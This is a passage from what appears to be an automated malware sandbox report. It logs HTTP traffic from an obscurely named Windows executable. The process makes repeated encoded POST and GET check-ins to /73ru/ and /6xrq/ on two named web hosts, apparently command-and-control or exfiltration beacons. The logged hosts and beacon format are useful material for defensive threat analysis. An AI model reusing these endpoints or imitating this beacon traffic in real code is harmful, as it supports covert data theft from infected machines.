                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  FAI-W-FLOW: 1440040166
                  Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96e
                  FAI-W-AGENT_AID: 23934566
                  Update-Time: 1718640911
                  Src-Update: true
                  P3P: CP=CAO PSA OUR
                  Origin-Agent-Cluster: ?0
                  X-Content-Type-Options: nosniff
                  X-Permitted-Cross-Domain-Policies: none
                  X-XSS-Protection: 1; mode=block
                  X-Download-Options: noopen
                  Vary: Accept-Encoding
                  Set-Cookie: _cliid=9tdS-TVUP42VT6Pl; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:25 GMT; HttpOnly
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 6b 65 79 77 6f 72 64 73 27 20 63 6f 6e 74 65 6e 74 3d 27 2d 27 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 64 65 73 63 72 69 70 74 69 6f 6e 27 20 63 6f 6e 74 65 6e 74 3d 27 2d 27 2f 3e 3c 74 69 74 6c 65 3e 2d 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 73 63 72 65 65 6e 2c 70 72 69 6e 74 27 3e 62 6f 64 79 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 39 46 39 46 39 3b 6d 61 72 67 69 6e 3a 20 30 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 e5 be ae e8 bd af e9 9b 85 e9 bb 91 27 2c 27 e5 ae 8b e4 bd 93 27 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 2e 62 6f 78 7b 77 69 64 74 68 3a [TRUNCATED]
                  Data Ascii: <!DOCTYPE HTML><html><head><meta charset='utf-8'><meta http-equiv='X-UA-Compatible' content='IE=edge' /><meta name='keywords' content='-'/><meta name='description' content='-'/><title>-</title><style type='text/css' media='screen,print'>body{ background:#F9F9F9;margin: 0px;font-family:'',''; font-size:12px;}.box{width: 100%;margin: 0 auto;height: auto}.box .titleContent { width: 100%;border-bottom-color: #e3e3e3;line-height:50px; background-color: #FFF;border-bottom-style: solid;border-bottom-width: 1px;}.box .titleContent .title{width:300px;height:5
                  Jul 3, 2024 10:53:25.491609097 CEST1236INData Raw: 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 25 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 32 70 78 3b 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 e5 be ae e8 bd af e9 9b 85 e9 bb 91 27 3b 20 66 6f
                  Data Ascii: 0px;margin-left:15%;padding-top:20px; padding:2px; font-family:''; font-size:20px;color: #4266b2;}.box .content{width:700px;height:auto;margin:0 auto; border-top-color: #fff;background-color: #f9f9f9;border-top-style: solid;border
                  Jul 3, 2024 10:53:25.491621017 CEST1236INData Raw: 2e 66 61 69 73 79 73 2e 63 6f 6d 2f 69 6d 61 67 65 2f 65 72 72 6f 72 2f 65 72 72 5f 69 6d 67 5f 62 67 2e 70 6e 67 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 70 78 20 2d 32 33 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 20 68 65 69
                  Data Ascii: .faisys.com/image/error/err_img_bg.png") no-repeat 0px -230px; margin-top:8px; height:15px;padding-left:17px;;margin-left:10px; display: inline;float: left;}.refresh .refreshTxt{margin-left:6px; display: inline;float: left;margin-top: 6px;}.er
                  Jul 3, 2024 10:53:25.491889000 CEST66INData Raw: 27 65 72 72 6f 72 42 75 74 74 6f 6e 27 20 69 64 3d 27 65 72 72 6f 72 42 74 6e 27 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: 'errorButton' id='errorBtn'></div></div></div></div></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.11497483.33.244.179801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:31.658545971 CEST699OUTPOST /73ru/ HTTP/1.1
                  Host: www.oliviacorepilates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.oliviacorepilates.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.oliviacorepilates.com/73ru/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 55 6a 57 6f 50 4c 2f 57 6d 4a 4b 6e 31 32 68 35 38 66 39 75 61 62 71 38 35 71 4d 61 4d 35 6e 2b 36 6a 42 2f 74 63 44 72 67 31 32 69 42 35 6e 6b 6a 48 62 49 71 5a 4d 42 6e 4a 66 38 61 37 32 4d 66 47 4a 6f 61 54 2b 32 34 52 67 79 68 42 69 33 39 44 6b 58 6a 69 70 70 45 33 7a 37 6d 7a 34 71 75 54 66 42 4e 56 76 74 44 41 37 31 4e 31 79 61 2b 72 55 41 78 59 55 4e 77 65 7a 73 48 49 30 41 59 55 62 30 47 63 69 41 4b 77 34 79 75 55 6a 49 6e 4a 36 4c 6c 49 4e 4c 4d 37 62 56 32 78 4e 4e 4a 5a 54 6a 4a 36 73 49 56 33 5a 2b 6a 31 6c 6f 59 72 32 49 2b 2b 67 63 4f 37 34 5a 4f 79 6b 65 6d 67 3d 3d
                  Data Ascii: ylT8el=UjWoPL/WmJKn12h58f9uabq85qMaM5n+6jB/tcDrg12iB5nkjHbIqZMBnJf8a72MfGJoaT+24RgyhBi39DkXjippE3z7mz4quTfBNVvtDA71N1ya+rUAxYUNwezsHI0AYUb0GciAKw4yuUjInJ6LlINLM7bV2xNNJZTjJ6sIV3Z+j1loYr2I++gcO74ZOykemg==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.11497493.33.244.179801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:34.194782019 CEST719OUTPOST /73ru/ HTTP/1.1
                  Host: www.oliviacorepilates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.oliviacorepilates.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.oliviacorepilates.com/73ru/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 55 6a 57 6f 50 4c 2f 57 6d 4a 4b 6e 30 58 78 35 36 34 70 75 63 37 71 2f 36 71 4d 61 44 5a 6e 36 36 6a 64 2f 74 59 62 64 68 47 43 69 42 62 2f 6b 78 53 76 49 74 5a 4d 42 73 70 66 35 55 62 32 4c 66 47 4e 61 61 54 53 32 34 52 63 79 68 41 53 33 6f 6b 51 51 73 53 70 72 4c 58 7a 35 6f 54 34 71 75 54 66 42 4e 52 48 48 44 41 6a 31 4e 45 43 61 2b 4b 55 44 76 49 55 4f 6d 4f 7a 73 44 49 30 63 59 55 62 57 47 5a 36 71 4b 7a 41 79 75 55 54 49 67 63 4f 4b 76 49 4e 4a 43 62 62 48 34 55 30 64 53 72 58 6a 51 5a 49 45 55 54 42 50 69 7a 30 79 49 49 2f 66 39 74 6f 65 61 64 5a 70 48 44 42 58 39 76 4c 30 59 6a 64 47 57 59 6e 46 4e 34 6d 4f 64 49 4c 54 6e 66 41 3d
                  Data Ascii: ylT8el=UjWoPL/WmJKn0Xx564puc7q/6qMaDZn66jd/tYbdhGCiBb/kxSvItZMBspf5Ub2LfGNaaTS24RcyhAS3okQQsSprLXz5oT4quTfBNRHHDAj1NECa+KUDvIUOmOzsDI0cYUbWGZ6qKzAyuUTIgcOKvINJCbbH4U0dSrXjQZIEUTBPiz0yII/f9toeadZpHDBX9vL0YjdGWYnFN4mOdILTnfA=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.11497503.33.244.179801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:36.740550995 CEST1732OUTPOST /73ru/ HTTP/1.1
                  Host: www.oliviacorepilates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.oliviacorepilates.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.oliviacorepilates.com/73ru/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 55 6a 57 6f 50 4c 2f 57 6d 4a 4b 6e 30 58 78 35 36 34 70 75 63 37 71 2f 36 71 4d 61 44 5a 6e 36 36 6a 64 2f 74 59 62 64 68 47 61 69 42 4b 66 6b 6a 68 33 49 73 5a 4d 42 6a 35 66 34 55 62 33 58 66 47 31 65 61 54 4f 49 34 55 51 79 67 69 61 33 73 67 4d 51 33 43 70 72 41 33 7a 30 6d 7a 35 77 75 54 50 46 4e 56 6a 48 44 41 6a 31 4e 48 71 61 75 4c 55 44 74 49 55 4e 77 65 7a 34 48 49 30 67 59 55 44 73 47 5a 32 51 4b 69 67 79 76 77 2f 49 6c 75 57 4b 6a 49 4e 50 44 72 61 55 34 55 78 48 53 6f 69 59 51 5a 4d 69 55 55 74 50 68 48 78 4e 53 70 4c 55 68 74 73 52 4d 73 52 7a 48 42 31 78 6c 63 43 4c 63 6d 5a 67 55 76 4b 51 42 61 2f 61 41 49 50 74 35 37 73 68 65 78 2f 37 44 37 6f 4a 49 78 55 64 57 6f 45 61 4f 61 45 77 71 4c 39 51 52 46 51 58 30 46 78 64 53 73 38 4b 71 64 74 2b 69 64 31 76 31 46 45 32 62 71 4b 57 61 6a 51 79 47 7a 43 59 69 73 43 44 43 42 49 31 51 79 61 79 69 41 79 39 42 45 7a 76 39 59 58 57 46 4e 32 44 4b 6f 4b 52 49 2b 42 61 4a 61 56 44 79 44 34 50 7a 6e 53 46 49 76 4d 37 72 42 45 [TRUNCATED]
                  Data Ascii: ylT8el=UjWoPL/WmJKn0Xx564puc7q/6qMaDZn66jd/tYbdhGaiBKfkjh3IsZMBj5f4Ub3XfG1eaTOI4UQygia3sgMQ3CprA3z0mz5wuTPFNVjHDAj1NHqauLUDtIUNwez4HI0gYUDsGZ2QKigyvw/IluWKjINPDraU4UxHSoiYQZMiUUtPhHxNSpLUhtsRMsRzHB1xlcCLcmZgUvKQBa/aAIPt57shex/7D7oJIxUdWoEaOaEwqL9QRFQX0FxdSs8Kqdt+id1v1FE2bqKWajQyGzCYisCDCBI1QyayiAy9BEzv9YXWFN2DKoKRI+BaJaVDyD4PznSFIvM7rBEfiltO07kfAgJjn+k62kKrqUzl6yku98sy6S1hJmFFRASbWreb4w4m3WHryw6Roi8j4Ty7DL+75pOYOkVsdJJKSnHg54RTcDFXNOjOLE8ZhUBb1TBrlsDxukU3Zl51Lr2yjv89kc4epy7tbzHC0QV1mY7ndAPkahUVaHgv/gfnOlJunSFSDY0VX+qT0icKpxI76MJLsEACl1waDcGh/s+n6nwY3J8raX/pFAJFdnocZPW7Yq6eCK7t+koQDEaX4ymCzajCm0r4O2p5pRquS0PRvvJGM/KqzOFFHcf9wi0Fn+xQ6R9PiC5CaFfZZVKqSqlzJDvd/U0ayeQSrxiHdungxucyKyRFpR7iOAjM4KSz7hx06PVVqpKcHBQr3cy26LDwv9qDbZ++5q4puxpwki3psHbIkaln9dt48l/wg2KCMHRmegzvsCfwPwWaDbGk92hhydUBdK5AcFvw8GMq4/jOROuBESu5pl2sswekj+C4t9vNkW4wcZ4+NSWf2QvBXwqHSEkgQMEsKBlTuirrSdg6vQxwpNMUUvxE4tGK835wNLkZfL3rps40bt2wv9u0feD6eEYvEdWevEb9qAmDs1+SKYtWKcOrE+IyEVvBOw8IFU1K40Koe2acZcEMl8PL/RGgG0doPmEBbSUXUDp8bR2NoV4opzIJ8J6Xj [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.11497513.33.244.179801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:39.277683973 CEST420OUTGET /73ru/?ylT8el=Zh+IM8qjm4uq8k9wxtMLd6Xf0ZIUNYGdjg1+kqPemyuHWYjZ2nTRrdxzh5HhdoGeXRxYWxa1gnZNrA+Bjjg73w83aTj9n1osxTjbZgXdDDbnL1DvvKoogN8=&Qb94=7vWTifjxU HTTP/1.1
                  Host: www.oliviacorepilates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:39.740819931 CEST397INHTTP/1.1 200 OK
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:53:39 GMT
                  Content-Type: text/html
                  Content-Length: 257
                  Connection: close
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 6c 54 38 65 6c 3d 5a 68 2b 49 4d 38 71 6a 6d 34 75 71 38 6b 39 77 78 74 4d 4c 64 36 58 66 30 5a 49 55 4e 59 47 64 6a 67 31 2b 6b 71 50 65 6d 79 75 48 57 59 6a 5a 32 6e 54 52 72 64 78 7a 68 35 48 68 64 6f 47 65 58 52 78 59 57 78 61 31 67 6e 5a 4e 72 41 2b 42 6a 6a 67 37 33 77 38 33 61 54 6a 39 6e 31 6f 73 78 54 6a 62 5a 67 58 64 44 44 62 6e 4c 31 44 76 76 4b 6f 6f 67 4e 38 3d 26 51 62 39 34 3d 37 76 57 54 69 66 6a 78 55 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ylT8el=Zh+IM8qjm4uq8k9wxtMLd6Xf0ZIUNYGdjg1+kqPemyuHWYjZ2nTRrdxzh5HhdoGeXRxYWxa1gnZNrA+Bjjg73w83aTj9n1osxTjbZgXdDDbnL1DvvKoogN8=&Qb94=7vWTifjxU"}</script></head></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.1149752104.21.21.230801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:44.773061037 CEST699OUTPOST /6xrq/ HTTP/1.1
                  Host: www.personalcaresale.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.personalcaresale.shop
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.personalcaresale.shop/6xrq/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 35 62 6a 4a 63 56 32 4e 7a 67 54 31 74 65 49 30 4a 33 4e 41 76 61 48 7a 78 69 36 71 5a 78 51 6d 63 6e 6e 7a 35 53 78 4a 4c 54 73 48 6c 52 46 65 44 46 39 39 56 43 51 54 6c 34 36 56 68 66 69 74 2f 4b 6d 5a 38 45 2b 4d 57 4a 50 73 78 57 46 39 68 56 6f 77 79 4a 65 56 37 43 68 6f 30 78 73 55 67 48 2b 6b 43 4f 64 50 65 62 76 2b 79 30 5a 7a 56 6f 76 5a 50 46 56 6c 67 63 6b 68 76 58 35 4f 4c 62 74 39 71 43 61 38 45 76 31 52 6c 57 67 4b 61 4f 6a 6f 49 59 62 76 68 45 41 61 71 31 43 2f 6a 67 31 51 6d 33 4a 72 73 77 2b 53 52 41 71 4e 30 4b 56 56 55 4d 58 72 53 6e 71 2b 7a 62 6e 45 6d 67 3d 3d
                  Data Ascii: ylT8el=5bjJcV2NzgT1teI0J3NAvaHzxi6qZxQmcnnz5SxJLTsHlRFeDF99VCQTl46Vhfit/KmZ8E+MWJPsxWF9hVowyJeV7Cho0xsUgH+kCOdPebv+y0ZzVovZPFVlgckhvX5OLbt9qCa8Ev1RlWgKaOjoIYbvhEAaq1C/jg1Qm3Jrsw+SRAqN0KVVUMXrSnq+zbnEmg==
                  Jul 3, 2024 10:53:45.389847994 CEST700INHTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:53:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  X-Powered-By: PHP/7.4.33
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2F3VUpqZ02hxAOrdy5rAfygw52MPm9RKb2e6ChyOTy8THX61WcOizyyoVHDmOmHVsL7090hm83orzOA6wqFuoU1rJGNNK2nJtr0jOsbUqjYf%2FEIt0zyvWMMBBMLaV%2FmboV9sF2mm52ldDM1G"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 89d5a59d5f5a72b3-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 190


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.1149753104.21.21.230801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:47.306629896 CEST719OUTPOST /6xrq/ HTTP/1.1
                  Host: www.personalcaresale.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.personalcaresale.shop
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.personalcaresale.shop/6xrq/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 35 62 6a 4a 63 56 32 4e 7a 67 54 31 76 39 41 30 61 6b 31 41 6f 36 48 30 2b 43 36 71 51 52 51 36 63 6e 72 7a 35 54 30 55 4c 68 34 48 6c 31 42 65 43 45 39 39 53 43 51 54 71 59 36 51 73 2f 69 32 2f 4b 62 6d 38 45 79 4d 57 4b 7a 73 78 54 42 39 68 45 6f 7a 7a 5a 65 58 39 43 68 71 77 78 73 55 67 48 2b 6b 43 4f 4a 78 65 61 48 2b 79 67 6c 7a 48 5a 76 57 4d 46 56 6d 71 38 6b 68 34 6e 34 6d 4c 62 74 66 71 44 58 5a 45 74 4e 52 6c 55 6f 4b 62 62 44 72 52 6f 62 74 6c 45 42 34 6a 6e 4c 6d 6a 68 34 34 6d 68 4e 63 6c 52 2b 74 64 6d 37 58 6b 70 63 43 58 66 66 70 47 42 4c 4f 36 71 43 4e 39 6c 6e 49 66 42 43 47 4f 2b 66 77 65 55 37 5a 72 57 76 39 50 58 63 3d
                  Data Ascii: ylT8el=5bjJcV2NzgT1v9A0ak1Ao6H0+C6qQRQ6cnrz5T0ULh4Hl1BeCE99SCQTqY6Qs/i2/Kbm8EyMWKzsxTB9hEozzZeX9ChqwxsUgH+kCOJxeaH+yglzHZvWMFVmq8kh4n4mLbtfqDXZEtNRlUoKbbDrRobtlEB4jnLmjh44mhNclR+tdm7XkpcCXffpGBLO6qCN9lnIfBCGO+fweU7ZrWv9PXc=
                  Jul 3, 2024 10:53:48.018042088 CEST706INHTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:53:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  X-Powered-By: PHP/7.4.33
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rja9d8I04aHyYYI%2FqkuA7cgALUyPoYfNmWCImh3yaBuU8Y46Jd8RZ3XlgT80qIQN%2Fkazy4QeqgFHvQjKQr5gTjxvHBjriPkDMSsfjUklIjGIAcDYy6CRB1Fbw%2B%2B7ujvMVDXrna5Jt6o4jNZe"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 89d5a5adcdbf42bb-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: fa0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.1149754104.21.21.230801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:49.838572979 CEST1732OUTPOST /6xrq/ HTTP/1.1
                  Host: www.personalcaresale.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.personalcaresale.shop
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.personalcaresale.shop/6xrq/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 35 62 6a 4a 63 56 32 4e 7a 67 54 31 76 39 41 30 61 6b 31 41 6f 36 48 30 2b 43 36 71 51 52 51 36 63 6e 72 7a 35 54 30 55 4c 68 67 48 6c 41 56 65 44 6e 56 39 54 43 51 54 30 6f 36 52 73 2f 69 37 2f 4b 79 76 38 45 75 36 57 50 33 73 78 31 39 39 32 47 51 7a 71 70 65 58 77 69 68 33 30 78 73 42 67 44 61 6f 43 4f 5a 78 65 61 48 2b 79 6d 42 7a 45 49 76 57 41 6c 56 6c 67 63 6b 6c 76 58 34 64 4c 62 6c 6c 71 44 53 73 45 63 74 52 6c 30 34 4b 58 50 6a 72 4f 59 62 6a 6f 6b 42 65 6a 6e 58 44 6a 68 6b 61 6d 68 52 69 6c 52 47 74 65 78 48 4d 31 62 31 55 4a 73 2f 6b 64 54 66 50 6d 4c 6a 49 6c 30 6a 78 51 69 54 30 4d 4b 62 77 63 31 79 57 38 31 6a 43 53 6e 31 44 4c 57 49 75 57 6e 37 51 4e 31 58 79 50 78 50 49 6a 55 46 42 62 6e 56 4e 66 55 41 31 32 6c 33 68 49 52 31 71 62 51 2f 67 68 42 6d 51 75 31 43 64 34 35 54 6c 44 70 77 54 66 6d 58 74 54 72 53 74 76 44 6b 64 33 4f 37 74 67 52 4b 52 47 45 68 66 78 70 37 44 4d 50 70 73 4d 75 7a 61 2b 5a 68 77 30 57 57 79 4e 52 42 73 49 49 6c 65 38 68 61 6d 42 52 55 [TRUNCATED]
                  Data Ascii: ylT8el=5bjJcV2NzgT1v9A0ak1Ao6H0+C6qQRQ6cnrz5T0ULhgHlAVeDnV9TCQT0o6Rs/i7/Kyv8Eu6WP3sx1992GQzqpeXwih30xsBgDaoCOZxeaH+ymBzEIvWAlVlgcklvX4dLbllqDSsEctRl04KXPjrOYbjokBejnXDjhkamhRilRGtexHM1b1UJs/kdTfPmLjIl0jxQiT0MKbwc1yW81jCSn1DLWIuWn7QN1XyPxPIjUFBbnVNfUA12l3hIR1qbQ/ghBmQu1Cd45TlDpwTfmXtTrStvDkd3O7tgRKRGEhfxp7DMPpsMuza+Zhw0WWyNRBsIIle8hamBRUp1Ls/qF2POOwyLIcnCH/D3PsxPuoHJ6tRPv9mjft7gtxCzvEOo44d0mU5zrvJV8oS1iO3o8ym9HB3a2V/zAh7kO/ZZ4qz1h6zyKvEa0ZndwFxGjXtK7ydDxAvOwHrr1019aWfc0vwnM/rmWjurmozdjeQuS6ODaAeVaeM1/rEA73uLyeXeBRdEv7KQORov/buNcHLm9cy2gN4nheHdnNIIIkQJGfIedy8XoNCHi8zaTStzw+kXNwFs2mkkKU4jTi/LJcCVjvc7VcJodLgRy6/oh9H/1MBBKObnXQJOejRF7H2wNtsy5hwJJzceccxnvUWFdlh68SVRwWttIrjraISTev8JYb0AdNqnbLilm+xwPx1Rxpx5ywTs4LqaN8TyTaTs9zX63ZhMgdhkkZIPFYsxfmfuhabMQ9b7VPlVov/NwpSzwupcVJiesTZVkc7R4njF++QklTBJWuzBJxeFbNR1O59gwnQt1fd31/oQgU2TkQfS4gZLqfsLE/PewTk6d6dJig90rmERIwGyU/TtRFQoyWDm7erG3SVD0GXzZi48/wO3bmxAVYj6UuDFuhDOwkakynNAIUKzy8/wtv1w2UIpeNSpVwAPRlVd9PP/UkED6SF8NiOPZA3AdDM2okogJMZxK1PdqZ3NcLXebOMVdn6+bLMyI5YXbT2h [TRUNCATED]
                  Jul 3, 2024 10:53:50.463789940 CEST708INHTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  X-Powered-By: PHP/7.4.33
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L1Y%2FznWSJWw9k9Cb7166enshXr7IU5eRh0bEVR2zsJimcF0rzg8kMSSrvAl%2BaQbiDanA6%2F%2BDf9v6wIbQF9VSzicuNsfbnG1%2BCGkdMKhDUQazHRQL1dNdALEvP%2BtAJyOccGyX104oGut4KN%2Fs"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 89d5a5bcfe6bc358-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 190


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
